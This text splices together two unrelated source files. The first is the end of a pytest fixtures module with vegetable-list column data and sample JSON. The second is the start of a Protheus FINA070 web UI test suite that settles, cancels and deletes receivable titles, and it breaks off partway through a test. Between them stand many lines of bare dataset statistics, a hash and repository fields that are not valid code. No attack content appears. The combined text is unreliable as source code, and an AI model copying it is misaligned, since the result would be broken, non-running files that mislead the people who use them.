    return [
        {"id": 5, "name": "Asparagus", "colour": "green", "count": 9, "herb": False},
        {"id": 20, "name": "Kale", "colour": "green", "count": 4, "herb": False},
        {"id": 44, "name": "Sweet Potato", "colour": "orange", "count": 12, "herb": False},
        {"id": 34, "name": "Winter Squash", "colour": "orange", "count": 13, "herb": False},
    ]

@pytest.fixture()
def entries_0():
    """Empty input data"""
    # Edge case: no entries at all.
    return []
# Fixtures for representing data out
# Expected output shape: a list of columns, each column a list of entry dicts.
@pytest.fixture()
def columns_4():
    """4 columns of out data, each having a varying number of entries"""
    return [
        [
            {"id": 5, "name": "Asparagus", "colour": "green", "count": 9, "herb": False},
            {"id": 2, "name": "Basil", "colour": "green", "count": 5, "herb": True},
            {"id": 6, "name": "Beans", "colour": "yellow", "count": 5, "herb": False},
            {"id": 8, "name": "Broccoli", "colour": "green", "count": 8, "herb": False},
        ],
        # NOTE(review): these two entries carry only "id" and "name" (no colour/count/herb),
        # unlike every other entry -- presumably intentional test data; confirm.
        [{"id": 48, "name": "Fred"}, {"id": 19, "name": "Garlic"}],
        [
            {"id": 26, "name": "Pumpkins", "colour": "orange", "count": 8, "herb": False},
            {"id": 37, "name": "Rosemary", "colour": "green", "count": 8, "herb": True},
            {"id": 41, "name": "Sage", "colour": "green", "count": 4, "herb": True},
            {"id": 29, "name": "Spinach", "colour": "green", "count": 7, "herb": False},
            {"id": 30, "name": "Summer Squash", "colour": "yellow", "count": 12, "herb": False},
        ],
        [
            {"id": 16, "name": "Sweet Corn", "colour": "yellow", "count": 10, "herb": False},
            {"id": 33, "name": "Watermelon", "colour": "red", "count": 10, "herb": False},
            {"id": 34, "name": "Winter Squash", "colour": "orange", "count": 13, "herb": False},
        ],
    ]

@pytest.fixture()
def columns_2():
    """2 columns of out data, each having a varying number of entries"""
    return [
        [
            {"id": 5, "name": "Asparagus", "colour": "green", "count": 9, "herb": False},
            {"id": 2, "name": "Basil", "colour": "green", "count": 5, "herb": True},
            {"id": 6, "name": "Beans", "colour": "yellow", "count": 5, "herb": False},
            {"id": 8, "name": "Broccoli", "colour": "green", "count": 8, "herb": False},
            {"id": 9, "name": "Brussels Sprouts", "colour": "green", "count": 16, "herb": False},
            {"id": 10, "name": "Cabbage", "colour": "green", "count": 7, "herb": False},
        ],
        [
            {"id": 41, "name": "Sage", "colour": "green", "count": 4, "herb": True},
            {"id": 29, "name": "Spinach", "colour": "green", "count": 7, "herb": False},
            {"id": 30, "name": "Summer Squash", "colour": "yellow", "count": 12, "herb": False},
        ],
    ]
def padded_columns_16():
    """
    Columns with 16 entries where some entries are blank to fill shorter columns to match the longest
    Used in parametrized fixture "padded_columns"
    """
    keys = ("id", "name", "colour", "count", "herb")
    # "" marks a padding cell; every tuple becomes a full vegetable record.
    raw = [
        [
            (5, "Asparagus", "green", 9, False),
            (2, "Basil", "green", 5, True),
            (6, "Beans", "yellow", 5, False),
            (7, "Beets", "red", 5, False),
            (24, "Bell Peppers", "red", 12, False),
            (8, "Broccoli", "green", 8, False),
            (9, "Brussels Sprouts", "green", 16, False),
            (10, "Cabbage", "green", 7, False),
            (21, "Cantaloupe", "orange", 10, False),
            (4, "Carrots", "orange", 7, False),
            (11, "Cauliflower", "white", 11, False),
            (12, "Celery", "green", 6, False),
            (31, "Chard", "green", 5, False),
            (13, "Chives", "green", 6, True),
            (38, "Cilantro", "green", 8, True),
            (14, "Collard Greens", "green", 14, False),
        ],
        [
            (15, "Cucumbers", "green", 9, False),
            (45, "Dill", "green", 4, True),
            (17, "Eggplant", "purple", 8, False),
            (48, "Fred", "human", 4, False),
            (49, "Fred the Son", "human", 12, False),
            (19, "Garlic", "white", 6, True),
            (20, "Kale", "green", 4, False),
            (3, "Lettuce", "green", 7, False),
            (40, "Mint", "green", 4, True),
            (43, "Okra", "green", 4, False),
            (18, "Onion", "white", 5, False),
            (36, "Oregano", "green", 7, True),
            (39, "Parsley", "green", 7, True),
            (22, "Parsnips", "white", 8, False),
            (23, "Peas", "green", 4, False),
            (25, "Potatoes", "white", 8, False),
        ],
        [
            (26, "Pumpkins", "orange", 8, False),
            (27, "Radishes", "red", 8, False),
            (28, "Rhubarb", "red", 7, False),
            (37, "Rosemary", "green", 8, True),
            (41, "Sage", "green", 4, True),
            (29, "Spinach", "green", 7, False),
            (30, "Summer Squash", "yellow", 12, False),
            (16, "Sweet Corn", "yellow", 10, False),
            (44, "Sweet Potato", "orange", 12, False),
            (42, "Tarragon", "green", 8, True),
            (35, "Thyme", "green", 5, True),
            (1, "Tomatoes", "red", 8, False),
            (32, "Turnips", "white", 7, False),
            (33, "Watermelon", "red", 10, False),
            (34, "Winter Squash", "orange", 13, False),
            "",
        ],
    ]
    return [[cell if cell == "" else dict(zip(keys, cell)) for cell in col] for col in raw]
def padded_columns_4():
    """
    Columns with 4 entries where some entries are blank to fill shorter columns to match the longest
    Used in parametrized fixture "padded_columns"
    """
    keys = ("id", "name", "colour", "count", "herb")
    # "" marks a padding cell; every tuple becomes a full vegetable record.
    raw = [
        [
            (5, "Asparagus", "green", 9, False),
            (2, "Basil", "green", 5, True),
            (6, "Beans", "yellow", 5, False),
            (7, "Beets", "red", 5, False),
        ],
        [
            (15, "Cucumbers", "green", 9, False),
            (45, "Dill", "green", 4, True),
            (17, "Eggplant", "purple", 8, False),
            (48, "Fred", "human", 4, False),
        ],
        [
            (26, "Pumpkins", "orange", 8, False),
            (27, "Radishes", "red", 8, False),
            (28, "Rhubarb", "red", 7, False),
            "",
        ],
    ]
    return [[cell if cell == "" else dict(zip(keys, cell)) for cell in col] for col in raw]
@pytest.fixture(params=[(padded_columns_4(), 4, 3), (padded_columns_16(), 16, 3)])
def padded_columns(request):
    """Pytest parametrized fixture to return the listed fixtures"""
    # Each param is a (columns, num_items, num_cols) triple built by the helper
    # functions above; tests using this fixture run once per triple.
    return request.param
@pytest.fixture()
def fixture_padded_columns_4():
    """Columns with 4 entries where some entries are blank to fill shorter columns to match the longest"""
    # Same payload as one leg of the parametrized "padded_columns" fixture:
    # a (columns, num_items, num_cols) triple, rebuilt fresh on every call.
    return [padded_columns_4(), 4, 3]
@pytest.fixture()
def fixture_padded_columns_16():
    """Columns with 16 entries where some entries are blank to fill shorter columns to match the longest"""
    # Same payload as one leg of the parametrized "padded_columns" fixture:
    # a (columns, num_items, num_cols) triple, rebuilt fresh on every call.
    return [padded_columns_16(), 16, 3]
@pytest.fixture()
def columns_many():
    """Simulating many columns being returned with varying numbers of entries in each"""

    def _build_cols(num_items, num_cols):
        """Return num_cols equal-length columns plus one extra full-length column.

        The shared column length is num_items minus a random amount (possibly
        all of it, leaving empty columns).
        """
        short_len = num_items - random.randint(0, num_items)
        # Build each column independently. The original code wrote
        # `cols = [col for i in range(num_cols)]`, which repeated ONE list
        # object num_cols times — mutating any column mutated all of them.
        cols = [[{} for _ in range(short_len)] for _ in range(num_cols)]
        # One more column guarantees at least one with the full num_items.
        cols.append([{} for _ in range(num_items)])
        return cols

    return _build_cols
@pytest.fixture()
def columns_same_length_4():
    """Columns are all the same length ... test will demonstrate they stay that way"""
    keys = ("id", "name", "colour", "count", "herb")
    raw = [
        [
            (5, "Asparagus", "green", 9, False),
            (2, "Basil", "green", 5, True),
            (6, "Beans", "yellow", 5, False),
            (7, "Beets", "red", 5, False),
        ],
        [
            (15, "Cucumbers", "green", 9, False),
            (45, "Dill", "green", 4, True),
            (17, "Eggplant", "purple", 8, False),
            (48, "Fred", "human", 4, False),
        ],
        [
            (26, "Pumpkins", "orange", 8, False),
            (27, "Radishes", "red", 8, False),
            (28, "Rhubarb", "red", 7, False),
            (35, "Thyme", "green", 5, True),
        ],
    ]
    return [[dict(zip(keys, row)) for row in col] for col in raw]
@pytest.fixture()
def first_column_empty_5():
    """First column is empty ... test will demonstrate this edge case can be handled"""
    keys = ("id", "name", "colour", "count", "herb")
    raw = [
        [],  # deliberately empty first column
        [
            (5, "Asparagus", "green", 9, False),
            (2, "Basil", "green", 5, True),
            (6, "Beans", "yellow", 5, False),
            (7, "Beets", "red", 5, False),
            (24, "Bell Peppers", "red", 12, False),
        ],
        [
            (8, "Broccoli", "green", 8, False),
            (15, "Cucumbers", "green", 9, False),
            (45, "Dill", "green", 4, True),
            (17, "Eggplant", "purple", 8, False),
            (1, "Tomatoes", "red", 8, False),
        ],
    ]
    return [[dict(zip(keys, row)) for row in col] for col in raw]
@pytest.fixture()
def last_column_empty_2():
    """Last column is empty ... test will demonstrate this edge case can be handled"""
    pairs = [
        [(5, "Asparagus"), (2, "Basil")],
        [(15, "Cucumbers"), (45, "Dill")],
        [(22, "Parsnips"), (23, "Peas")],
        [],  # deliberately empty last column
    ]
    return [[{"id": i, "name": n} for i, n in col] for col in pairs]
@pytest.fixture()
def all_columns_empty():
    """All columns are empty ... test will demonstrate this edge case can be handled"""
    # 100 empty columns exercise the degenerate "nothing to display" case.
    return [[] for _ in range(100)]
# Fixtures for specifically testing CriteriaVMCView
@pytest.fixture()
def criteria_functions_2():
    """2 functions are passed to a VMCCriteria view"""

    def a_to_m(values):
        # First letter of the first field falls in A..M.
        return values[0][0] in "ABCDEFGHIJKLM"

    def n_to_z(values):
        # First letter of the first field falls in N..Z.
        return values[0][0] in "NOPQRSTUVWXYZ"

    return [a_to_m, n_to_z]
@pytest.fixture()
def criteria_functions_3():
    """3 functions are passed to a VMCCriteria view"""

    def a_to_m_and_count_less_than_10(values):
        """Items matching this condition go in column 1"""
        return values[0][0] in "ABCDEFGHIJKLM" and values[1] < 10

    def n_to_z_and_count_10_or_greater(values):
        """Items matching this condition go in column 2"""
        return values[0][0] in "NOPQRSTUVWXYZ" and values[1] >= 10

    def is_herb(values):
        """Items matching this condition go in column 3"""
        return values[2] is True

    return [a_to_m_and_count_less_than_10, n_to_z_and_count_10_or_greater, is_herb]
@pytest.fixture()
def criteria_functions_4():
    """4 functions are passed to a VMCCriteria view"""

    # Each predicate buckets an entry by the first letter of its first field.
    def a_to_d(values):
        return values[0][0] in "ABCD"

    def e_to_m(values):
        return values[0][0] in "EFGHIJKLM"

    def n_to_r(values):
        return values[0][0] in "NOPQR"

    def s_to_z(values):
        return values[0][0] in "STUVWXYZ"

    return [a_to_d, e_to_m, n_to_r, s_to_z]
@pytest.fixture()
def criteria_functions_5():
    """5 functions are passed to a VMCCriteria view"""

    # Each predicate buckets an entry by the first letter of its first field.
    def a_to_d(values):
        return values[0][0] in "ABCD"

    def e_to_m(values):
        return values[0][0] in "EFGHIJKLM"

    def n_to_r(values):
        return values[0][0] in "NOPQR"

    def s_to_u(values):
        return values[0][0] in "STU"

    def v_to_z(values):
        return values[0][0] in "VWXYZ"

    return [a_to_d, e_to_m, n_to_r, s_to_u, v_to_z]
@pytest.fixture()
def function_args_2():
    """dictionary keys are passed"""
    # Keys looked up on each entry; their values become the argument list handed
    # to the criteria_functions_2 predicates (only "name" is consulted there).
    return ["name"]
@pytest.fixture()
def function_args_3():
    """dictionary keys are passed"""
    # Keys looked up on each entry; criteria_functions_3 reads them positionally
    # as values[0]=name, values[1]=count, values[2]=herb.
    return ["name", "count", "herb"]
@pytest.fixture()
def function_args_4():
    """dictionary keys are passed"""
    # Keys looked up on each entry for the criteria_functions_4 predicates.
    return ["name"]
@pytest.fixture()
def function_args_5():
    """dictionary keys are passed"""
    # Keys looked up on each entry for the criteria_functions_5 predicates.
    return ["name"]
# Fixtures specifically for testing get_queryset - common in - specific out by VMC class
@pytest.fixture()
def test_in_even_criteria_data():
    """Input data for ListView's get_queryset() override in EvenVMCView and CriteriaVMCView tests"""
    entries = [
        (5, "Asparagus"), (2, "Basil"), (6, "Beans"), (7, "Beets"),
        (24, "Bell Peppers"), (8, "Broccoli"), (9, "Brussels Sprouts"),
        (10, "Cabbage"), (21, "Cantaloupe"), (4, "Carrots"), (11, "Cauliflower"),
        (12, "Celery"), (31, "Chard"), (13, "Chives"), (38, "Cilantro"),
        (14, "Collard Greens"), (15, "Cucumbers"), (45, "Dill"), (17, "Eggplant"),
        (19, "Garlic"), (20, "Kale"), (3, "Lettuce"), (40, "Mint"), (43, "Okra"),
        (18, "Onion"), (36, "Oregano"), (39, "Parsley"), (22, "Parsnips"),
        (23, "Peas"), (25, "Potatoes"), (26, "Pumpkins"), (27, "Radishes"),
        (28, "Rhubarb"), (37, "Rosemary"), (41, "Sage"), (29, "Spinach"),
        (30, "Summer Squash"), (16, "Sweet Corn"), (44, "Sweet Potato"),
        (42, "Tarragon"), (35, "Thyme"), (1, "Tomatoes"), (32, "Turnips"),
        (33, "Watermelon"), (34, "Winter Squash"),
    ]
    # A flat, name-sorted list of 45 id/name records.
    return [{"id": i, "name": n} for i, n in entries]
@pytest.fixture()
def test_out_even_data():
    """Out data for the override of ListView's get_queryset() in EvenVMCView"""
    # 15 rows of 3 columns each: the 45 input records dealt evenly.
    rows = [
        [(5, "Asparagus"), (14, "Collard Greens"), (26, "Pumpkins")],
        [(2, "Basil"), (15, "Cucumbers"), (27, "Radishes")],
        [(6, "Beans"), (45, "Dill"), (28, "Rhubarb")],
        [(7, "Beets"), (17, "Eggplant"), (37, "Rosemary")],
        [(24, "Bell Peppers"), (19, "Garlic"), (41, "Sage")],
        [(8, "Broccoli"), (20, "Kale"), (29, "Spinach")],
        [(9, "Brussels Sprouts"), (3, "Lettuce"), (30, "Summer Squash")],
        [(10, "Cabbage"), (40, "Mint"), (16, "Sweet Corn")],
        [(21, "Cantaloupe"), (43, "Okra"), (44, "Sweet Potato")],
        [(4, "Carrots"), (18, "Onion"), (42, "Tarragon")],
        [(11, "Cauliflower"), (36, "Oregano"), (35, "Thyme")],
        [(12, "Celery"), (39, "Parsley"), (1, "Tomatoes")],
        [(31, "Chard"), (22, "Parsnips"), (32, "Turnips")],
        [(13, "Chives"), (23, "Peas"), (33, "Watermelon")],
        [(38, "Cilantro"), (25, "Potatoes"), (34, "Winter Squash")],
    ]
    return [[{"id": i, "name": n} for i, n in row] for row in rows]
@pytest.fixture()
def test_out_criteria_data():
    """Out data for the override of ListView's get_queryset() in CriteriaVMCView"""

    def cell(entry):
        # "" is a padding cell; tuples become id/name records.
        return {"id": entry[0], "name": entry[1]} if entry else ""

    rows = [
        [(5, "Asparagus"), (19, "Garlic"), (42, "Tarragon")],
        [(2, "Basil"), (20, "Kale"), (35, "Thyme")],
        [(6, "Beans"), (3, "Lettuce"), (1, "Tomatoes")],
        [(7, "Beets"), (40, "Mint"), (32, "Turnips")],
        [(24, "Bell Peppers"), (43, "Okra"), (33, "Watermelon")],
        [(8, "Broccoli"), (18, "Onion"), (34, "Winter Squash")],
        [(9, "Brussels Sprouts"), (36, "Oregano"), ""],
        [(10, "Cabbage"), (39, "Parsley"), ""],
        [(21, "Cantaloupe"), (22, "Parsnips"), ""],
        [(4, "Carrots"), (23, "Peas"), ""],
        [(11, "Cauliflower"), (25, "Potatoes"), ""],
        [(12, "Celery"), (26, "Pumpkins"), ""],
        [(31, "Chard"), (27, "Radishes"), ""],
        [(13, "Chives"), (28, "Rhubarb"), ""],
        [(38, "Cilantro"), (37, "Rosemary"), ""],
        [(14, "Collard Greens"), (41, "Sage"), ""],
        [(15, "Cucumbers"), (29, "Spinach"), ""],
        [(45, "Dill"), (30, "Summer Squash"), ""],
        [(17, "Eggplant"), (16, "Sweet Corn"), ""],
        ["", (44, "Sweet Potato"), ""],
    ]
    return [[cell(e) for e in row] for row in rows]
@pytest.fixture()
def test_in_defined_data():
    """Input data for ListView's get_queryset() override in DefinedVMCView tests"""
    # Four pre-split columns of uneven lengths (9, 1, 7, 6 entries).
    cols = [
        [
            (5, "Asparagus"), (2, "Basil"), (6, "Beans"), (7, "Beets"),
            (24, "Bell Peppers"), (8, "Broccoli"), (9, "Brussels Sprouts"),
            (10, "Cabbage"), (21, "Cantaloupe"),
        ],
        [(19, "Garlic")],
        [
            (20, "Kale"), (3, "Lettuce"), (40, "Mint"), (43, "Okra"),
            (18, "Onion"), (36, "Oregano"), (39, "Parsley"),
        ],
        [
            (42, "Tarragon"), (35, "Thyme"), (1, "Tomatoes"),
            (32, "Turnips"), (33, "Watermelon"), (34, "Winter Squash"),
        ],
    ]
    return [[{"id": i, "name": n} for i, n in col] for col in cols]
@pytest.fixture()
def test_out_defined_data():
    """Out data for the override of ListView's get_queryset() in DefinedVMCView"""

    def cell(entry):
        # "" is a padding cell; tuples become id/name records.
        return {"id": entry[0], "name": entry[1]} if entry else ""

    # 9 rows of 4 columns: the defined columns padded to the longest (9).
    rows = [
        [(5, "Asparagus"), (19, "Garlic"), (20, "Kale"), (42, "Tarragon")],
        [(2, "Basil"), "", (3, "Lettuce"), (35, "Thyme")],
        [(6, "Beans"), "", (40, "Mint"), (1, "Tomatoes")],
        [(7, "Beets"), "", (43, "Okra"), (32, "Turnips")],
        [(24, "Bell Peppers"), "", (18, "Onion"), (33, "Watermelon")],
        [(8, "Broccoli"), "", (36, "Oregano"), (34, "Winter Squash")],
        [(9, "Brussels Sprouts"), "", (39, "Parsley"), ""],
        [(10, "Cabbage"), "", "", ""],
        [(21, "Cantaloupe"), "", "", ""],
    ]
    return [[cell(e) for e in row] for row in rows]
@pytest.fixture()
def json_data_structure_with_all_data_types():
    """
    This JSON contains all the JSON data types: string, number, boolean, null/empty, object, and array.
    It was generated by calling requests and converting to Python format using .JSON method provided by requests.
    """
    # Three records, each exercising every JSON type once (null maps to None,
    # booleans to True/False, objects to dicts, arrays to lists).
    return [
        {
            "id": 1,
            "title": "hello",
            "count": 35,
            "boolean": True,
            "empty": None,
            "object": {"a": "susan", "b": 3},
            "array": [1, 2, 3],
        },
        {
            "id": 2,
            "title": "goodbye",
            "count": 42,
            "boolean": False,
            "empty": None,
            "object": {"a": "peter", "b": 32},
            "array": [11, 12, 13],
        },
        {
            "id": 3,
            "title": "adieu",
            "count": 22,
            "boolean": True,
            "empty": None,
            "object": {"a": "indy", "b": 90},
            "array": [111, 112, 113],
        },
    ]
@pytest.fixture()
def heirarchical_data_structure():
    """Hierarchical JSON data (fixture name keeps its historical spelling)"""

    def _members():
        # Fresh copies on each call so the two squads never share mutable state,
        # matching the original's two independent literals.
        return [
            {
                "name": "Molecule Man",
                "age": 29,
                "secretIdentity": "Dan Jukes",
                "powers": [
                    "Radiation resistance",
                    "Turning tiny",
                    "Radiation blast",
                ],
            },
            {
                "name": "Madame Uppercut",
                "age": 39,
                "secretIdentity": "Jane Wilson",
                "powers": [
                    "Million tonne punch",
                    "Damage resistance",
                    "Superhuman reflexes",
                ],
            },
            {
                "name": "Eternal Flame",
                "age": 1000000,
                "secretIdentity": "Unknown",
                "powers": [
                    "Immortality",
                    "Heat Immunity",
                    "Inferno",
                    "Teleportation",
                    "Interdimensional travel",
                ],
            },
        ]

    return [
        {
            "squadName": "Super hero squad",
            "homeTown": "Metro City",
            "formed": 2016,
            "secretBase": "Super tower",
            "active": True,
            "members": _members(),
        },
        {
            "squadName": "Super hero squad2",
            "homeTown": "Toronto",
            "formed": 2020,
            "secretBase": "Super tower",
            "active": False,
            "members": _members(),
        },
    ]
| 40.793066
| 113
| 0.449511
| 4,004
| 37,652
| 4.17033
| 0.088412
| 0.077075
| 0.088274
| 0.029644
| 0.8722
| 0.787819
| 0.757875
| 0.721284
| 0.700922
| 0.680501
| 0
| 0.041762
| 0.31507
| 37,652
| 922
| 114
| 40.83731
| 0.605723
| 0.076118
| 0
| 0.711313
| 0
| 0
| 0.291932
| 0.000637
| 0
| 0
| 0
| 0
| 0
| 1
| 0.06632
| false
| 0
| 0.003901
| 0
| 0.128739
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6ce128d464a04346095d432e7af7a1e6926893e1
| 36,733
|
py
|
Python
|
Protheus_WebApp/Modules/SIGAFIN/FINA070TESTCASE.py
|
98llm/tir-script-samples
|
0bff8393b79356aa562e9e6512c11ee6e039b177
|
[
"MIT"
] | 17
|
2018-09-24T17:27:08.000Z
|
2021-09-16T19:09:46.000Z
|
Protheus_WebApp/Modules/SIGAFIN/FINA070TESTCASE.py
|
98llm/tir-script-samples
|
0bff8393b79356aa562e9e6512c11ee6e039b177
|
[
"MIT"
] | 4
|
2018-09-24T17:30:32.000Z
|
2022-01-03T11:39:30.000Z
|
Protheus_WebApp/Modules/SIGAFIN/FINA070TESTCASE.py
|
98llm/tir-script-samples
|
0bff8393b79356aa562e9e6512c11ee6e039b177
|
[
"MIT"
] | 18
|
2019-06-07T17:41:34.000Z
|
2022-01-31T18:17:31.000Z
|
import unittest
import time
from tir import Webapp
from datetime import datetime

# Test-run date formatted as dd/mm/yyyy; evaluated once at import time, so
# every test in the run shares the same base date passed to Setup().
DateSystem = datetime.today().strftime('%d/%m/%Y')
class FINA070(unittest.TestCase):
@classmethod
def setUpClass(inst):
inst.oHelper = Webapp()
inst.oHelper.Setup("SIGAFIN", DateSystem, "T1", "D MG 01 ", "06")
inst.oHelper.Program("FINA070")
    ### CT190
    ### Settle a receivable title ("Baixar titulo").
    ### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T40989
    def test_FINA070_CT190(self):
        """Partially settle title A070TIR01/A and check the PIS/COFINS/CSLL amounts."""
        prefixo = "FIN"
        titulo = "A070TIR01"
        parcela = "A"
        tipo = "NF "
        banco = "001"
        agencia = "001"
        conta = "001"
        data = "30/05/2019"
        # NOTE(review): MV_BR10925 presumably controls tax withholding at
        # settlement time — confirm against the routine's documentation.
        self.oHelper.AddParameter("MV_BR10925", "", "1", "1", "1")
        self.oHelper.SetParameters()
        self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
        self.oHelper.SetButton("Baixar")
        self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
        # Fill in the settlement form and check the computed tax deductions.
        self.oHelper.SetValue("Mot.Baixa", "NORMAL")
        self.oHelper.SetValue("Banco", banco)
        self.oHelper.SetValue("Agência", agencia)
        self.oHelper.SetValue("Conta", conta)
        self.oHelper.SetValue("Data Receb.", data)
        self.oHelper.SetValue("Data Crédito", data)
        self.oHelper.SetValue("= Valor Recebido", "3000,00")
        self.oHelper.CheckResult("- Pis", "19,50")
        self.oHelper.CheckResult("- Cofins", "90,00")
        self.oHelper.CheckResult("- Csll", "30,00")
        self.oHelper.SetButton("Salvar")
        # Reopen the settlement screen to confirm the partial payment was
        # recorded and the remaining amounts were recalculated.
        self.oHelper.SetButton("Baixar")
        self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
        self.oHelper.CheckResult("- Pagtos Parciais", "3000,00")
        self.oHelper.CheckResult("- Pis", "6,50")
        self.oHelper.CheckResult("- Cofins", "30,00")
        self.oHelper.CheckResult("- Csll", "10,00")
        self.oHelper.CheckResult("= Valor Recebido", "814,00")
        self.oHelper.SetButton("Cancelar")
        self.oHelper.AssertTrue()
    ### CT191
    ### Cancel a settlement ("Cancelar baixa").
    ### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T40991
    def test_FINA070_CT191(self):
        """Cancel the settlement of title A070TIR01/B and verify the amounts are restored."""
        prefixo = "FIN"
        titulo = "A070TIR01"
        parcela = "B"
        tipo = "NF "
        # The MV_BR10925 parameter is already configured by CT190.
        # self.oHelper.AddParameter("MV_BR10925", "", "1", "1", "1")
        # #self.oHelper.SetParameters()
        self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
        self.oHelper.SetButton("Outras Ações", "Canc Baixa")
        self.oHelper.SetButton("Confirmar")
        self.oHelper.CheckHelp(text='TOTVS',button='Sim')
        # Verify the cancellation: no partial payments remain and the full
        # receivable amounts are shown again.
        self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
        self.oHelper.SetButton("Baixar")
        self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
        self.oHelper.CheckResult("- Pagtos Parciais", "0,00")
        self.oHelper.CheckResult("- Pis", "26,00")
        self.oHelper.CheckResult("- Cofins", "120,00")
        self.oHelper.CheckResult("- Csll", "40,00")
        self.oHelper.CheckResult("= Valor Recebido", "3814,00")
        self.oHelper.SetButton("Cancelar")
        self.oHelper.AssertTrue()
    ### CT192
    ### Delete a settlement ("Excluir baixa").
    ### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T40992
    def test_FINA070_CT192(self):
        """Delete the settlement of title A070TIR01/C and verify the amounts are restored."""
        prefixo = "FIN"
        titulo = "A070TIR01"
        parcela = "C"
        tipo = "NF "
        # The MV_BR10925 parameter is already configured by CT190.
        # self.oHelper.AddParameter("MV_BR10925", "", "1", "1", "1")
        # self.oHelper.SetParameters()
        self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
        self.oHelper.SetButton("Outras Ações", "Excluir")
        self.oHelper.SetButton("Confirmar")
        self.oHelper.CheckHelp(text='TOTVS',button='Sim')
        # Verify the settlement was removed: the full amounts are shown again.
        self.oHelper.SetButton("Baixar")
        self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
        self.oHelper.CheckResult("- Pagtos Parciais", "0,00")
        self.oHelper.CheckResult("- Pis", "26,00")
        self.oHelper.CheckResult("- Cofins", "120,00")
        self.oHelper.CheckResult("- Csll", "40,00")
        self.oHelper.CheckResult("= Valor Recebido", "3814,00")
        self.oHelper.SetButton("Cancelar")
        self.oHelper.AssertTrue()
        # self.oHelper.AddParameter("MV_BR10925", "", "2", "1", "1")
        # self.oHelper.SetParameters()
    ### CT193
    ### Settle a title with a late-payment fine ("multa").
    ### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T40986
    def test_FINA070_CT193(self):
        """Settle FIN002152: no fine on 21/06, a 10,00 fine when settled on 28/06."""
        prefixo = "FIN"
        titulo = "FIN002152"
        parcela = " "
        tipo = "NF "
        banco = "001"
        agencia = "001"
        conta = "001"
        data = "21/06/2019"
        self.oHelper.AddParameter("MV_BR10925", "", "2", "2", "2")# restore from the previous test
        self.oHelper.AddParameter("MV_JURTIPO", "", "L", "L", "L")
        self.oHelper.AddParameter("MV_FINJRTP", "", "2", "2", "2")
        # NOTE(review): MV_LJMULTA 0.10 presumably sets the fine rate — confirm.
        self.oHelper.AddParameter("MV_LJMULTA", "", "0.10", "0.10", "0.10")
        self.oHelper.SetParameters()
        self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
        self.oHelper.SetButton("Baixar")
        self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
        # On the earlier date no fine is charged.
        self.oHelper.SetValue("Data Receb.", data)
        self.oHelper.SetValue("Data Crédito", data)
        self.oHelper.CheckResult("+ Multa", "0,00")
        self.oHelper.CheckResult("= Valor Recebido", "10000,00")
        self.oHelper.SetButton("Cancelar")
        self.oHelper.SetButton("Baixar")
        self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
        # A week later the fine applies and the received total grows by it.
        data = "28/06/2019"
        self.oHelper.SetValue("Mot.Baixa", "NORMAL")
        self.oHelper.SetValue("Banco", banco)
        self.oHelper.SetValue("Agência", agencia)
        self.oHelper.SetValue("Conta", conta)
        self.oHelper.SetValue("Data Receb.", data)
        self.oHelper.SetValue("Data Crédito", data)
        self.oHelper.CheckResult("+ Multa", "10,00")
        self.oHelper.CheckResult("= Valor Recebido", "10010,00")
        self.oHelper.SetButton("Salvar")
        self.oHelper.AssertTrue()
        #self.oHelper.AddParameterReset()
    ### CT198
    ### Settle a title apportioned across multiple "naturezas" (financial natures).
    ### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T41643
    def test_FINA070_CT198(self):
        """Settle title 000000102 with a multi-nature apportionment and review it."""
        prefixo = "FIN"
        titulo = "000000102"
        parcela = " "
        tipo = "NF "
        self.oHelper.AddParameter("MV_JURTIPO", "", "M", "M", "M") # restore from the previous test
        self.oHelper.AddParameter("MV_MULNATR", "", ".T.", ".T.", ".T.")
        self.oHelper.AddParameter("MV_IMPBXCR", "", "2", "2", "2") # parameter for CT260
        self.oHelper.AddParameter("MV_MOEDBCO", "", ".T.", ".T.", ".T.")
        self.oHelper.AddParameter("MV_SLDBXCR", "", "C", "C", "C") # CT220
        self.oHelper.AddParameter("MV_CMC7FIN", "", "S", "S", "S") # CT220
        self.oHelper.SetParameters()
        self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
        self.oHelper.SetButton("Baixar")
        self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
        # NOTE(review): blank-labelled field set to True — presumably a checkbox
        # on the settlement screen; confirm which control this targets.
        self.oHelper.SetValue("", True)
        self.oHelper.SetButton("Salvar")
        # Fill the apportionment grid: one nature line with cost-centre split.
        self.oHelper.SetValue("Natureza", "001", grid=True, row=1)
        self.oHelper.SetValue("Vlr.Movim.", "12000,00", grid=True, row=1)
        self.oHelper.SetValue("Rat. C.Custo", "1 - Sim", grid=True, row=1)
        self.oHelper.LoadGrid()
        self.oHelper.SetButton("Outras Ações", "Rateio")
        self.oHelper.SetValue("cCodRateio", "001", name_attr=True)
        self.oHelper.SetButton("Ok")
        self.oHelper.SetButton("Salvar")
        self.oHelper.SetButton("Salvar")
        # Open the multi-nature apportionment enquiry to confirm it was stored.
        self.oHelper.SetButton("Outras Ações", "Consulta Rateio Multi Naturezas")
        self.oHelper.WaitShow("Contas a Receber - Consulta Rateio Múltiplas Naturezas - Visualizar")
        self.oHelper.ClickFolder("Baixas")
